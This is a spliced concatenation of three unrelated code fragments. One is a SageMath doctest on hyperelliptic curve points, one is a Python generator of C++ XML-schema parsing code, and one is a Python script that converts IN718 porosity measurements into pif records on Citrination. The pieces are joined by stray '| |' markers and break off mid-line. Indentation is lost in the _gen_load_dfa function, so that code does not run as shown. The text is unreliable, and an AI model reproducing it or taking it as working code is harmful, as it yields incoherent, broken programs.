sage: C = HyperellipticCurve(x^5 - x^2 - 1, x^2 + a)
sage: len(C._points_fast_sqrt())
31
TESTS::
sage: x = polygen(GF(16, 'a'))
sage: C = HyperellipticCurve(x^5 - x + 1, x^2 + x + 1)
sage: set(C._points_fast_sqrt()) == set(C._points_cache_sqrt())
True
sage: x = polygen(GF(19))
sage: C = HyperellipticCurve(x^5 + 5*x^2 + 1, x + 1)
sage: set(C._points_fast_sqrt()) == set(C._points_cache_sqrt())
True
sage: x = polygen(GF(13))
sage: C = HyperellipticCurve(x^3 + x^2 - 1)
sage: C._points_fast_sqrt()
[(0 : 1 : 0), (0 : 5 : 1), (0 : 8 : 1), (1 : 1 : 1), (1 : 12 | |
from typing import Union, List
from . import cpp_templates, utils
from .utils import checked
from .version import __version__
from .third_party import triehash
from .schema import (
UxsdSchema,
UxsdComplex,
UxsdDfa,
UxsdAll,
UxsdLeaf,
UxsdElement,
UxsdEnum,
UxsdSimple,
UxsdString,
UxsdAtomic,
UxsdAttribute,
)
def pass_at_init(attr: UxsdAttribute):
    """Return True if *attr*'s value is supplied when its parent element is
    created (init/add) rather than through a separate setter.

    Optional attributes and C-string attributes are always set after
    creation.
    """
    return not (attr.optional or attr.type.cpp == "const char *")
def _gen_attribute_arg(e: Union[UxsdElement, UxsdAttribute], out:bool=False) -> str:
    """Render a C++ parameter declaration for *e*: a pointer parameter when
    *out* is True, a by-value parameter otherwise."""
    template = "%s * %s" if out else "%s %s"
    return template % (e.type.cpp, checked(e.name))
def _gen_required_attribute_arg_list(context_type: str, attrs: List[UxsdAttribute], out:bool=False, context:str = "ctx") -> str:
    """Build the comma-separated C++ parameter list for the attributes that
    must be passed at element creation, sorted by attribute name.

    Input (non-out) signatures are prefixed with a context reference.
    """
    params = [] if out else ["{} &{}".format(context_type, context)]
    params.extend(
        _gen_attribute_arg(a, out=out)
        for a in sorted(attrs, key=lambda a: a.name)
        if pass_at_init(a)
    )
    return ', '.join(params)
def _gen_context_type(t: UxsdComplex, direction : str) -> str:
    """Return the dependent ContextTypes member typename for *t* in the
    given direction ("Read" or "Write")."""
    pascal_name = utils.to_pascalcase(t.name)
    return "typename ContextTypes::%s%sContext" % (pascal_name, direction)
def _gen_virtual_fns(t: UxsdComplex) -> str:
    """Generate virtual functions to interface with an element with a complex type.

    Emits one pure-virtual declaration per getter/setter/adder/init hook
    required by *t*'s attributes and content model, wrapped in a comment
    showing the originating schema source.
    """
    fields = []
    def _add_field(ret: str, verb: str, what: str, args: str):
        # Every hook is: virtual inline <ret> <verb>_<type>_<what>(<args>) = 0;
        fields.append("virtual inline %s %s_%s_%s(%s) = 0;" % (ret, verb, t.name, what, args))
    def _add_set(e: Union[UxsdElement, UxsdAttribute]):
        _add_field("void", "set", e.name, "{}, {} &ctx".format(_gen_attribute_arg(e), _gen_context_type(t, "Write")))
    def _add_init(e: UxsdElement):
        assert isinstance(e.type, UxsdComplex)
        _add_field(_gen_context_type(e.type, "Write"), "init", e.name, _gen_required_attribute_arg_list(_gen_context_type(t, "Write"), e.type.attrs))
        _add_field("void", "finish", e.name, _gen_context_type(e.type, "Write") + " &ctx")
    def _add_add_simple(e: UxsdElement):
        # Bug fix: the original applied the "%" operator to a "{}"-style
        # template ("{} {}, {} &ctx" % (...)), which raises TypeError the
        # first time a many-valued simple element is generated.  Use
        # str.format, matching _add_set above.
        _add_field("void", "add", e.name, "{} {}, {} &ctx".format(e.type.cpp, checked(e.name), _gen_context_type(t, "Write")))
    def _add_add_complex(e: UxsdElement):
        assert isinstance(e.type, UxsdComplex)
        _add_field("void", "preallocate", e.name, _gen_context_type(t, "Write") + " &ctx, size_t size")
        _add_field(_gen_context_type(e.type, "Write"), "add", e.name, _gen_required_attribute_arg_list(_gen_context_type(t, "Write"), e.type.attrs))
        _add_field("void", "finish", e.name, _gen_context_type(e.type, "Write") + " &ctx")
    def _add_add(e: UxsdElement):
        if isinstance(e.type, UxsdSimple): _add_add_simple(e)
        elif isinstance(e.type, UxsdComplex): _add_add_complex(e)
        else: raise TypeError(e)
    def _add_get_simple(e: Union[UxsdElement, UxsdAttribute]):
        _add_field(e.type.cpp, "get", e.name, _gen_context_type(t, "Read") + " &ctx")
    def _add_get_simple_many(e: UxsdElement):
        _add_field(e.type.cpp, "get", e.name, _gen_context_type(t, "Read") + " &ctx")
    def _add_get_complex(e: UxsdElement):
        _add_field(_gen_context_type(e.type, "Read"), "get", e.name, _gen_context_type(t, "Read") + " &ctx")
    def _add_get_complex_many(e: UxsdElement):
        _add_field(_gen_context_type(e.type, "Read"), "get", e.name, "int n, {}".format(_gen_context_type(t, "Read") + " &ctx"))
    def _add_num(e: UxsdElement):
        _add_field("size_t", "num", e.name, _gen_context_type(t, "Read") + " &ctx")
    def _add_has(e: UxsdElement):
        _add_field("bool", "has", e.name, _gen_context_type(t, "Read") + " &ctx")

    # Attributes: always readable; writable unless passed at init.
    for attr in t.attrs:
        _add_get_simple(attr)
        if not pass_at_init(attr):
            _add_set(attr)
    if isinstance(t.content, (UxsdDfa, UxsdAll)):
        # Child elements: many-valued children get add/num/get-by-index,
        # single children get init-or-set/get (plus has for optionals).
        for e in t.content.children:
            if isinstance(e.type, UxsdComplex):
                if e.many:
                    _add_add_complex(e)
                    _add_num(e)
                    _add_get_complex_many(e)
                else:
                    _add_init(e)
                    _add_get_complex(e)
                    if e.optional: _add_has(e)
            elif isinstance(e.type, UxsdSimple):
                if e.many:
                    _add_add_simple(e)
                    _add_num(e)
                    _add_get_simple_many(e)
                else:
                    _add_set(e)
                    _add_get_simple(e)
            else:
                raise TypeError(e)
    elif isinstance(t.content, UxsdLeaf):
        # Leaf content: a single value setter/getter pair.
        _add_field("void", "set", "value", "{} value, {} &ctx".format(t.content.type.cpp, _gen_context_type(t, "Write")))
        _add_field(t.content.type.cpp, "get", "value", _gen_context_type(t, "Read") + " &ctx")
    out = ""
    out += "/** Generated for complex type \"%s\":\n" % t.name
    out += utils.to_comment_body(t.source)
    out += "\n*/\n"
    out += "\n".join(fields)
    return out
def gen_base_class(schema: UxsdSchema) -> str:
    """Generate a C++ base class of a root element.

    Emits a Default<Root>ContextTypes struct (all contexts are ``void *``)
    followed by the abstract ``<Root>Base`` class template whose pure
    virtuals are produced by ``_gen_virtual_fns`` for every complex type.
    """
    out = ""
    root = schema.root_element
    class_name = utils.to_pascalcase(root.name)
    out += "struct Default{pname}ContextTypes {{\n".format(pname=class_name)
    # NOTE(review): "\n\t".join leaves the FIRST using-declaration of each
    # group without a leading tab in the generated C++ -- cosmetic only,
    # but confirm whether this indentation is intentional.
    out += "\n\t".join("using {}ReadContext = void *;".format(utils.to_pascalcase(x.name)) for x in schema.complex_types)
    out += "\n"
    out += "\n\t".join("using {}WriteContext = void *;".format(utils.to_pascalcase(x.name)) for x in schema.complex_types)
    out += "\n};\n"
    out += "\n"
    out += "template<typename ContextTypes=Default{pname}ContextTypes>\n".format(pname=class_name)
    out += "class %sBase {\n" % class_name
    out += "public:\n"
    out += "\tvirtual ~%sBase() {}\n" % class_name
    # Fixed lifecycle and error-reporting hooks shared by every schema.
    out += "\tvirtual void start_load(const std::function<void(const char*)> *report_error) = 0;\n"
    out += "\tvirtual void finish_load() = 0;\n"
    out += "\tvirtual void start_write() = 0;\n"
    out += "\tvirtual void finish_write() = 0;\n"
    out += "\tvirtual void error_encountered(const char * file, int line, const char *message) = 0;\n"
    virtual_fns = [_gen_virtual_fns(x) for x in schema.complex_types]
    out += utils.indent("\n\n".join(virtual_fns))
    out += "\n};\n"
    return out
#
def tokens_from_enum(t: UxsdEnum) -> str:
    """Generate C++ enum of token values from an UxsdEnum"""
    # UXSD_INVALID = 0 is always first so a zero-initialized value is invalid.
    members = ["UXSD_INVALID = 0"] + [utils.to_token(v) for v in t.enumeration]
    return "\nenum class %s {%s};" % (t.cpp, ", ".join(members))
def lookup_from_enum(t: UxsdEnum) -> str:
    """Generate C++ lookup table of tokens to strings from an UxsdEnum"""
    # Table is indexed by the enum's integer value, so UXSD_INVALID is slot 0.
    entries = ['"UXSD_INVALID"'] + ['"%s"' % v for v in t.enumeration]
    return "constexpr const char *lookup_%s[] = {%s};" % (t.name, ", ".join(entries))
def lexer_from_enum(t: UxsdEnum) -> str:
    """Generate a C++ function to convert const char *s to enum values generated
    from an UxsdEnum.

    It's in the form of enum_foo lex_enum_foo(const char *in, bool throw_on_invalid)
    and currently uses a trie to parse the string.

    throw_on_invalid is a hacky parameter to determine if we should throw on
    an invalid value. It's currently necessary to read unions - we don't need to
    throw on an invalid value if we are trying to read into an union but we need
    to throw otherwise.
    """
    alphabet = [(v, "%s::%s" % (t.cpp, utils.to_token(v))) for v in t.enumeration]
    pieces = [
        "inline %s lex_%s(const char *in, bool throw_on_invalid, const std::function<void(const char *)> * report_error){\n" % (t.cpp, t.cpp),
        utils.indent(triehash.gen_lexer_body(alphabet)),
        "\tif(throw_on_invalid)\n",
        "\t\tnoreturn_report(report_error, (\"Found unrecognized enum value \" + std::string(in) + \" of %s.\").c_str());\n" % t.cpp,
        "\treturn %s::UXSD_INVALID;\n" % t.cpp,
        "}\n",
    ]
    return "".join(pieces)
def tokens_from_complex_type(t: UxsdComplex) -> str:
    """Generate one or two C++ enums of token values from an UxsdComplex.

    One enum is generated from valid attribute names and the other from child element names.
    """
    parts = []
    if isinstance(t.content, (UxsdDfa, UxsdAll)):
        children = t.content.children
        child_tokens = ", ".join(utils.to_token(c.name) for c in children)
        child_names = ", ".join('"%s"' % c.name for c in children)
        parts.append("enum class gtok_%s {%s};\n" % (t.cpp, child_tokens))
        parts.append("constexpr const char *gtok_lookup_%s[] = {%s};" % (t.cpp, child_names))
    if t.attrs:
        attr_tokens = ", ".join(utils.to_token(a.name) for a in t.attrs)
        attr_names = ", ".join('"%s"' % a.name for a in t.attrs)
        parts.append("\nenum class atok_%s {%s};\n" % (t.cpp, attr_tokens))
        parts.append("constexpr const char *atok_lookup_%s[] = {%s};\n" % (t.cpp, attr_names))
    return "".join(parts)
def lexer_from_complex_type(t: UxsdComplex) -> str:
    """Generate one or two C++ functions to convert const char *s to enum values
    generated from an UxsdComplex.

    It's in the form of (a|g)tok_foo lex_(attr|node)_foo(const char *in) and currently uses
    a trie to lex the string. a or g indicates if the token is an attribute token or a group
    (child element) token.
    """
    out = ""
    # Child-element lexer: only for content models that actually have children.
    if isinstance(t.content, (UxsdDfa, UxsdAll)):
        out += "inline gtok_%s lex_node_%s(const char *in, const std::function<void(const char *)> *report_error){\n" % (t.cpp, t.cpp)
        triehash_alph = [(e.name, "gtok_%s::%s" % (t.cpp, utils.to_token(e.name))) for e in t.content.children]
        out += utils.indent(triehash.gen_lexer_body(triehash_alph))
        # Unlike the enum lexer, an unknown child element is always an error.
        out += "\tnoreturn_report(report_error, (\"Found unrecognized child \" + std::string(in) + \" of <%s>.\").c_str());\n" % t.name
        out += "}\n"
    # Attribute lexer: only emitted when the type declares attributes.
    if t.attrs:
        out += "inline atok_%s lex_attr_%s(const char *in, const std::function<void(const char *)> * report_error){\n" % (t.cpp, t.cpp)
        triehash_alph = [(x.name, "atok_%s::%s" % (t.cpp, utils.to_token(x.name))) for x in t.attrs]
        out += utils.indent(triehash.gen_lexer_body(triehash_alph))
        out += "\tnoreturn_report(report_error, (\"Found unrecognized attribute \" + std::string(in) + \" of <%s>.\").c_str());\n" % t.name
        out += "}\n"
    return out
#
def _gen_dfa_table(t: UxsdComplex) -> str:
    """Generate a 2D C++ array representing DFA table from an UxsdComplex's DFA.

    The array is indexed by the state and input token value, such that table[state][input]
    gives the next state.  Missing transitions are emitted as -1 (the error state).
    """
    assert isinstance(t.content, UxsdDfa)
    dfa = t.content.dfa
    out = ""
    out += "constexpr int NUM_%s_STATES = %d;\n" % (t.cpp.upper(), len(dfa.states))
    # NOTE(review): the extra "const" here (vs. the line above) is redundant
    # with constexpr -- kept to preserve the generated output byte-for-byte.
    out += "constexpr const int NUM_%s_INPUTS = %d;\n" % (t.cpp.upper(), len(dfa.alphabet))
    out += "constexpr int gstate_%s[NUM_%s_STATES][NUM_%s_INPUTS] = {\n" % (t.cpp, t.cpp.upper(), t.cpp.upper())
    for i in range(0, max(dfa.states)+1):
        state = dfa.transitions[i]
        # Single dict lookup per cell (the original did state.get(x) followed
        # by state[x]); a missing or None transition becomes -1.
        row = []
        for x in dfa.alphabet:
            nxt = state.get(x)
            row.append("-1" if nxt is None else str(nxt))
        out += "\t{%s},\n" % ", ".join(row)
    out += "};\n"
    return out
def _gen_stub_suffix(t: Union[UxsdElement, UxsdAttribute], parent: str) -> str:
    """Return the "<parent>_<name>" suffix used to name generated stubs."""
    return "{}_{}".format(parent, t.name)
def _gen_load_simple(t: UxsdSimple, input: str) -> str:
    """Return a C++ expression that converts the raw string *input* into a
    value of the simple type *t* (strings pass through unchanged)."""
    if isinstance(t, UxsdString):
        return input
    if isinstance(t, UxsdEnum):
        return "lex_%s(%s, true, report_error)" % (t.cpp, input)
    return "load_%s(%s, report_error)" % (utils.to_snakecase(t.cpp), input)
def _gen_load_element_complex(t: UxsdElement, parent: str) -> str:
    """Emit the C++ block that loads one complex-typed child element:
    declare and read its required attributes, create the child context via
    add_*/init_*, recurse into the child's loader, then finish it."""
    assert isinstance(t.type, UxsdComplex)
    out = "{\n"
    args = ["context"]
    load_args = []
    for attr in t.type.attrs:
        if not pass_at_init(attr):
            continue
        # One zero-initialized local per attribute that must be passed at
        # creation; its address is handed to the required-attributes loader.
        arg = "%s_%s" % (t.type.name, checked(attr.name))
        out += "\t%s %s;\n" % (attr.type.cpp, arg)
        out += "\tmemset(&{name}, 0, sizeof({name}));\n".format(name=arg)
        args.append(arg)
        load_args.append('&' + arg)
    if len(load_args) > 0:
        out += "\tload_%s_required_attributes(node, %s, report_error);\n" % (t.type.name, ', '.join(load_args))
    # Many-valued children are appended (add_*); single children are
    # initialized in place (init_*).
    if t.many:
        out += "\tauto child_context = out.add_%s(%s);\n" % (_gen_stub_suffix(t, parent), ', '.join(args))
    else:
        out += "\tauto child_context = out.init_%s(%s);\n" % (_gen_stub_suffix(t, parent), ', '.join(args))
    out += "\tload_%s(node, out, child_context, report_error, offset_debug);\n" % t.type.name
    out += "\tout.finish_%s(child_context);\n" % _gen_stub_suffix(t, parent)
    out += "}\n"
    return out
def _gen_load_element_simple(t: UxsdElement, parent: str) -> str:
    """Emit the single C++ statement that stores a simple-typed child
    element's text value (add_* for many-valued, set_* otherwise)."""
    assert isinstance(t.type, UxsdSimple)
    verb = "add" if t.many else "set"
    value_expr = _gen_load_simple(t.type, "node.child_value()")
    return "out.%s_%s(%s, context);\n" % (verb, _gen_stub_suffix(t, parent), value_expr)
def _gen_load_element(t: UxsdElement, parent: str) -> str:
    """Dispatch to the complex- or simple-typed child element loader."""
    if isinstance(t.type, UxsdComplex):
        return _gen_load_element_complex(t, parent)
    return _gen_load_element_simple(t, parent)
def _gen_load_attr(t: UxsdAttribute, parent: str) -> str:
    """Emit the statement that stores attribute *t*'s value, or a comment
    when the attribute was already passed at element creation."""
    if pass_at_init(t):
        return "/* Attribute %s is already set */\n" % t.name
    return "out.set_%s(%s, context);\n" % (_gen_stub_suffix(t, parent), _gen_load_simple(t.type, "attr.value()"))
def _gen_load_dfa(t: UxsdComplex) -> str:
"""Partial function to generate the child element validation&loading portion
of a C++ function load_foo, if the model group is an xs:sequence or xs:choice.
xs:sequence/xs:choice groups can be compiled down to a finite automaton.
This is done in dfa.py. C++ state table is generated in _gen_dfa_table and the
stream of child elements are validated according to the table here.
The C++ table has -1s in place of invalid state transitions. If we step into a -1,
we call dfa_error. We check again at the end of input. If we aren't in an accepted
state, we again call dfa_error.
"""
assert isinstance(t.content, UxsdDfa)
dfa = t.content.dfa
any_many = False
out = ""
for el in t.content.children:
if el.many:
if not any_many:
out += "// Preallocate arrays by counting child nodes (if any)\n"
out += "size_t {tag}_count = 0;\n".format(tag=el.name)
any_many = | |
import os
import math
import sys
import pandas as pd
from citrination_client import CitrinationClient
from pypif import pif
from pypif.obj import *
from IN718_porosity_updater.pore_statistics import *
sys.path.insert(0, '/Users/cborg/projects/community_projects/')
from community_projects.pycc_utils import pycc_wrappers
def parse_csv(csv_file_dir, pif_dir):
    """
    Convert porosity CSV exports (dataset 73) into pif ChemicalSystem JSON files.

    Per-sample files ("<sample>.csv") each become one JSON file carrying pore
    center-of-mass properties plus derived pore statistics.  Whole-part files
    ("<sample>_full.csv") are then used to append a 'fraction porosity'
    property to the matching JSON file.

    :param csv_file_dir: directory containing the UTF-16 encoded CSV exports
    :param pif_dir: directory the pif JSON files are written to
    """
    csv_files = [f for f in os.listdir(csv_file_dir) if ".csv" in f and "_full" not in f]
    full_csv_files = [f for f in os.listdir(csv_file_dir) if "_full.csv" in f]
    for f in csv_files:
        df = pd.read_csv(csv_file_dir + f, encoding="utf-16")
        system = ChemicalSystem()
        # os.path.splitext drops only the extension.  The previous
        # f.strip(".csv") also stripped leading/trailing '.', 'c', 's', 'v'
        # characters from the sample name (e.g. "svc1.csv" -> "1").
        sample_id = os.path.splitext(f)[0]
        system.ids = [Id(name='Sample ID', value=sample_id)]
        cm_x = [Scalar(value=x) for x in df['Center Of Mass X (µm)']]
        cm_y = [Scalar(value=x) for x in df['Center Of Mass Y (µm)']]
        cm_z = [Scalar(value=x) for x in df['Center Of Mass Z (µm)']]
        method = Method(name='porosity', software=Software(name='tracr', version='beta'))
        prop_x = Property(name='center of mass X', scalars=cm_x, units=r'$\mu m$', method=method)
        prop_y = Property(name='center of mass Y', scalars=cm_y, units=r'$\mu m$', method=method)
        prop_z = Property(name='center of mass Z', scalars=cm_z, units=r'$\mu m$', method=method)
        system.properties = [prop_x, prop_y, prop_z]
        # Derived pore statistics.  NOTE(review): the statistic helpers and
        # `np` are assumed to come from the `pore_statistics` star import --
        # confirm that module exports numpy as np.
        x = df['Center Of Mass X (µm)']
        y = df['Center Of Mass Y (µm)']
        z = df['Center Of Mass Z (µm)']
        volumes = df['Volume (µm³)']
        diameters = sphere_equivalent_diameter(volumes)
        # (name, scalars, units) in the same append order as before; units of
        # None means the property carries no units (e.g. a bare count).
        pore_stats = [
            ('neighbor pore distance',
             [Scalar(value=v) for v in nearest_neighbor_distance(x, y, z)], r'$\mu m$'),
            ('median pore diameter', Scalar(value=median_pore_diameter(volumes)), r'$\mu m$'),
            ('median pore spacing', Scalar(value=median_pore_spacing(x, y, z)), r'$\mu m$'),
            ('mean pore spacing', Scalar(value=mean_pore_spacing(x, y, z)), r'$\mu m$'),
            ('max pore diameter', Scalar(value=max_pore_diameter(volumes)), r'$\mu m$'),
            ('pore volume', [Scalar(value=v) for v in volumes], r'${\mu m}^3$'),
            ('pore diameters', [Scalar(value=v) for v in diameters], r'$\mu m$'),
            ('stdev of pore diameters', Scalar(value=round(np.std(diameters), 3)), r'$\mu m$'),
            ('total pores', Scalar(value=len(volumes)), None),
        ]
        for prop_name, scalars, units in pore_stats:
            prop = Property(name=prop_name, scalars=scalars)
            if units is not None:
                prop.units = units
            system.properties.append(prop)
        print(pif.dumps(system.ids))
        outfile_path = pif_dir + f.replace('.csv', '.json')
        with open(outfile_path, 'w') as outfile:
            pif.dump(system, outfile)
    for f in full_csv_files:
        df = pd.read_csv(csv_file_dir + f, encoding="utf-16")
        outfile_path = f.replace('_full.csv', '.json')
        if outfile_path in os.listdir(pif_dir):
            with open(pif_dir + outfile_path, 'r') as infile:
                system = pif.load(infile)
            for prop in system.properties:
                if prop.name == 'pore volume':
                    total_porosity_vol = sum([sca.value for sca in prop.scalars])
                    # NOTE(review): float(Series) assumes the _full csv has
                    # exactly one volume row -- confirm upstream guarantee.
                    fractional_porosity = round(float(total_porosity_vol / df['Volume (µm³)']), 6)
                    system.properties.append(Property(name='fraction porosity', scalars=fractional_porosity))
            with open(pif_dir + outfile_path, 'w') as outfile:
                pif.dump(system, outfile)
            print("Fraction porosity calc: ", outfile_path)
def get_files_from_dataset(dataset_id, download_path):
    """Download every file of a Citrination dataset into `download_path`.

    Reads the API key from the CITRINATION_ADAPT_API_KEY environment variable.
    """
    client = CitrinationClient(os.environ['CITRINATION_ADAPT_API_KEY'],
                               site='https://adapt.citrination.com')
    print(client)
    dataset_files = client.data.get_dataset_files(dataset_id=dataset_id)
    print("Downloading {} files...".format(len(dataset_files)))
    client.data.download_files(dataset_files, destination=download_path)
def add_identifiers_to_pifs(systems, f):
    """Attach a 'Sample ID' id to every system, derived from the print
    row/column recorded in its 'printing' preparation step.

    The id has the form "<file base>_<column><row>", with the row zero-padded
    to two digits (e.g. "P001_B001_B03").

    :param systems: list of pif systems; mutated in place
    :param f: source file name, e.g. "P001_B001-nohough.json"
    :return: the same list, for chaining
    :raises ValueError: if a system has no printing row/column details
    """
    base = f.replace("-nohough.json", "")
    for system in systems:
        # Reset per system: previously these names leaked from one loop
        # iteration to the next (and raised NameError on the first system
        # if the details were missing).
        row_id = None
        column_id = None
        for prep in system.preparation:
            if prep.name == 'printing':
                for det in prep.details:
                    if det.name == 'row':
                        row_id = det.scalars
                    if det.name == 'column':
                        column_id = det.scalars
        if row_id is None or column_id is None:
            raise ValueError("system in %s is missing printing row/column details" % f)
        # zfill(2) reproduces the old "rows < 10 get a leading zero" behavior.
        sample_id = base + "_" + column_id + str(row_id).zfill(2)
        system.ids = [Id(name='Sample ID', value=sample_id)]
    return systems
def add_heat_treatment_to_pifs(systems, f):
    """Record whether the build plate was heat treated on every system.

    Only the P001_B001 plate was heat treated; all other files get "NO".

    :param systems: list of pif systems; mutated in place
    :param f: source file name used to identify the plate
    :return: the same list, for chaining
    """
    treated = "YES" if "P001_B001" in f else "NO"
    for system in systems:
        step = ProcessStep(
            name="Plate heat treatment",
            details=Value(name="Heat treatment performed", scalars=treated))
        system.preparation.append(step)
    return systems
def modify_master_dataset(master_branch_dir, develop_branch_dir):
    """Load each JSON pif file from the master branch directory, enrich it,
    and write the result into the develop branch directory.

    NOTE(review): relies on a module-level `base_download_path` -- assumed to
    be defined elsewhere in this module; confirm.
    """
    for fname in os.listdir(master_branch_dir):
        if ".json" not in fname:
            continue
        systems = pif.load(open(master_branch_dir + fname))
        systems = add_identifiers_to_pifs(systems, fname)
        systems = add_heat_treatment_to_pifs(systems, fname)
        systems = add_porosity_data_to_pifs(systems, base_download_path + "data/porosity_jsons/")
        systems = add_porosity_stats_to_pifs(systems)
        systems = add_pore_diameter_bucket_prop(systems)
        systems = remove_unverified_pore_data(systems)
        destination = develop_branch_dir + fname
        pif.dump(systems, open(destination, "w"))
        print("DUMPED: ", destination)
def remove_unverified_pore_data(systems):
    """Clear the properties of systems whose sample id failed verification.

    Fixes the original ``if system in systems`` -- `system` was never defined
    in this scope, so the function raised NameError instead of iterating.

    :param systems: list of pif systems, each with ids[0].value populated
    :return: the same list, for chaining
    """
    unverified_ids = ['P001_B001_X13', 'P001_B001_B03', 'P001_B001_B14']
    for system in systems:
        if system.ids[0].value in unverified_ids:
            system.properties = []
    return systems
def add_pore_diameter_bucket_prop(systems):
    """Append histogram-bucket counts of pore diameters to each system.

    Buckets: <50, 50-100, 100-150, 150-200, and >200 um.  The new properties
    are collected first and appended after the scan, so we never append to
    ``system.properties`` while iterating it (the original did, which worked
    only by accident because the added names never matched 'pore diameters').

    :param systems: list of pif systems; mutated in place
    :return: the same list, for chaining
    """
    buckets = [
        ('pore diameter < 50 um', lambda d: d < 50),
        ('pore diameter 50 < x < 100 um', lambda d: 50 < d < 100),
        ('pore diameter 100 < x < 150 um', lambda d: 100 < d < 150),
        ('pore diameter 150 < x < 200 um', lambda d: 150 < d < 200),
        ('pore diameter x > 200 um', lambda d: d > 200),
    ]
    for system in systems:
        if not system.properties:
            continue
        new_props = []
        for prop in system.properties:
            if prop.name == 'pore diameters':
                diameters = [float(sca.value) for sca in prop.scalars]
                for bucket_name, in_bucket in buckets:
                    count = len([d for d in diameters if in_bucket(d)])
                    new_props.append(Property(name=bucket_name, scalars=count))
        system.properties.extend(new_props)
    return systems
def add_porosity_data_to_pifs(systems, data_porosity_jsons):
    """Copy porosity properties from per-sample JSON files onto the matching
    systems (matched by the 'Sample ID' in ids[0]).

    :param systems: list of pif systems; mutated in place
    :param data_porosity_jsons: directory of per-sample porosity pif JSONs
    :return: the same list, for chaining
    """
    for f in os.listdir(data_porosity_jsons):
        if ".json" not in f:
            continue
        # `with` closes the handle; the original leaked an open file per JSON.
        with open(data_porosity_jsons + f, "r") as infile:
            porosity_data_system = pif.load(infile)
        porosity_system_sample_id = porosity_data_system.ids[0].value
        for system in systems:
            if system.ids[0].value == porosity_system_sample_id:
                # Replaces (not merges) any existing properties on the match.
                system.properties = porosity_data_system.properties
    return systems
def add_porosity_stats_to_pifs(systems):
    """Derive statistical properties from each system's raw porosity data.

    From 'pore volume': distribution-fit r^2 values (normal vs lognormal),
    the better-fitting distribution name, and -- if absent -- pore diameters,
    their stdev, and the total pore count.  From 'max pore diameter': binary
    and ternary size warnings plus its log10.  From 'median pore diameter':
    a >22um / <22um classifier.

    NOTE(review): appends to ``system.properties`` while iterating it; safe
    only because none of the appended names re-trigger these branches.
    ``np``, ``qq_normal``, ``qq_lognormal`` and ``sphere_equivalent_diameter``
    are assumed to come from the `pore_statistics` star import -- confirm.

    :param systems: list of pif systems; mutated in place
    :return: the same list, for chaining
    """
    for system in systems:
        if system.properties:
            # Snapshot of names present BEFORE this function adds anything.
            prop_names = [prop.name for prop in system.properties]
            for prop in system.properties:
                if prop.name == 'pore volume':
                    pore_volumes = [float(sca.value) for sca in prop.scalars]
                    # r^2 of Q-Q fits against normal / lognormal distributions.
                    r_squared_norm = round(qq_normal(sphere_equivalent_diameter(pore_volumes))[2]**2, 4)
                    r_squared_lognorm = round(qq_lognormal(sphere_equivalent_diameter(pore_volumes))[2]**2, 4)
                    system.properties.append(Property(name='r_squared_norm', scalars=r_squared_norm))
                    system.properties.append(Property(name='r_squared_lognorm', scalars=r_squared_lognorm))
                    if r_squared_norm > r_squared_lognorm:
                        system.properties.append(Property(name='dist_best_fit', scalars='NORM'))
                    else:
                        system.properties.append(Property(name='dist_best_fit', scalars='LOGNORM'))
                    # Backfill derived properties only when the source JSON
                    # did not already provide them.
                    if 'pore diameters' not in prop_names:
                        pore_diameters = [Scalar(value=x) for x in sphere_equivalent_diameter(pore_volumes)]
                        system.properties.append(Property(name='pore diameters', scalars=pore_diameters, units='$\mu m$'))
                    if 'stdev of pore diameters' not in prop_names:
                        stdev = Scalar(value=round(np.std(sphere_equivalent_diameter(pore_volumes)), 3))
                        system.properties.append(Property(name='stdev of pore diameters', scalars=stdev, units='$\mu m$'))
                    if 'total pores' not in prop_names:
                        total_pores = Scalar(value=len(pore_volumes))
                        system.properties.append(Property(name='total pores', scalars=total_pores))
                if prop.name == 'max pore diameter':
                    mpd = float(prop.scalars.value)
                    # Binary warning: anything above 200 um is flagged RED.
                    if mpd > 200:
                        system.properties.append(Property(name='Pore size warning', scalars='RED'))
                    else:
                        system.properties.append(Property(name='Pore size warning', scalars='GREEN'))
                    # Ternary warning adds a YELLOW band for 75-200 um.
                    if mpd > 200:
                        system.properties.append(Property(name='Pore size warning (ternary)', scalars='RED'))
                    elif 75 < mpd < 200:
                        system.properties.append(Property(name='Pore size warning (ternary)', scalars='YELLOW'))
                    else:
                        system.properties.append(Property(name='Pore size warning (ternary)', scalars='GREEN'))
                    system.properties.append(Property(name="log max pore diameter", scalars=Scalar(value=math.log10(mpd))))
                if prop.name == 'median pore diameter':
                    if prop.scalars.value > 22:
                        system.properties.append(Property(name='Median pore classifier', scalars='>22 um'))
                    else:
                        system.properties.append(Property(name='Median pore classifier', scalars='<22 um'))
    return systems
def refine_to_relevant_props(develop_branch_dir, feature_branch_dir):
    """Rewrite each develop-branch JSON keeping only the porosity and
    mechanical properties of interest, writing "<name>_refined.json" files.

    Mechanical properties are pulled up from sub-systems into the top-level
    system.  File handles are now closed deterministically via `with`
    (the original leaked one handle per file read/write).

    :param develop_branch_dir: directory of enriched pif JSON files
    :param feature_branch_dir: directory the refined JSON files are written to
    """
    porosity_props = ['max pore diameter', 'mean pore diameter', 'fraction porosity', 'median pore spacing',
                      'median pore diameter', 'log max pore diameter', 'Pore size warning',
                      'Pore size warning (ternary)', 'total pores', 'stdev of pore diameters', 'dist_best_fit',
                      'r_squared_norm', 'r_squared_lognorm', 'pore diameter < 50 um', 'pore diameter 50 < x < 100 um',
                      'pore diameter 100 < x < 150 um', 'pore diameter 150 < x < 200 um', 'pore diameter x > 200 um',
                      'Median pore classifier']
    mechanical_props = ['elastic modulus', 'elastic onset', 'yield strength', 'yield strain', 'ultimate strength',
                        'necking onset', 'fracture strength', 'total elongation', 'ductility', 'toughness']
    selected_prop_names = porosity_props + mechanical_props
    for f in os.listdir(develop_branch_dir):
        if ".json" not in f:
            continue
        infile_path = develop_branch_dir + f
        with open(infile_path, 'r') as infile:
            old_systems = pif.load(infile)
        print(infile_path, len(old_systems))
        new_systems = []
        for old_system in old_systems:
            # Copy identity/metadata; properties are rebuilt filtered.
            new_system = ChemicalSystem()
            new_system.names = old_system.names
            new_system.references = old_system.references
            new_system.ids = old_system.ids
            new_system.preparation = old_system.preparation
            new_system.properties = []
            if old_system.properties:
                for prop in old_system.properties:
                    if prop.name in selected_prop_names:
                        new_system.properties.append(prop)
            # mechanical props stored in subsystem
            if old_system.sub_systems:
                for sub_system in old_system.sub_systems:
                    if sub_system.properties:
                        for prop in sub_system.properties:
                            if prop.name in selected_prop_names:
                                new_system.properties.append(prop)
            new_systems.append(new_system)
        outfile_path = feature_branch_dir + f.replace(".json", "_refined.json")
        with open(outfile_path, 'w') as outfile:
            pif.dump(new_systems, outfile)
def upload_pifs(base_input_dir, dataset_id):
    """Upload every JSON file in `base_input_dir` to a Citrination dataset.

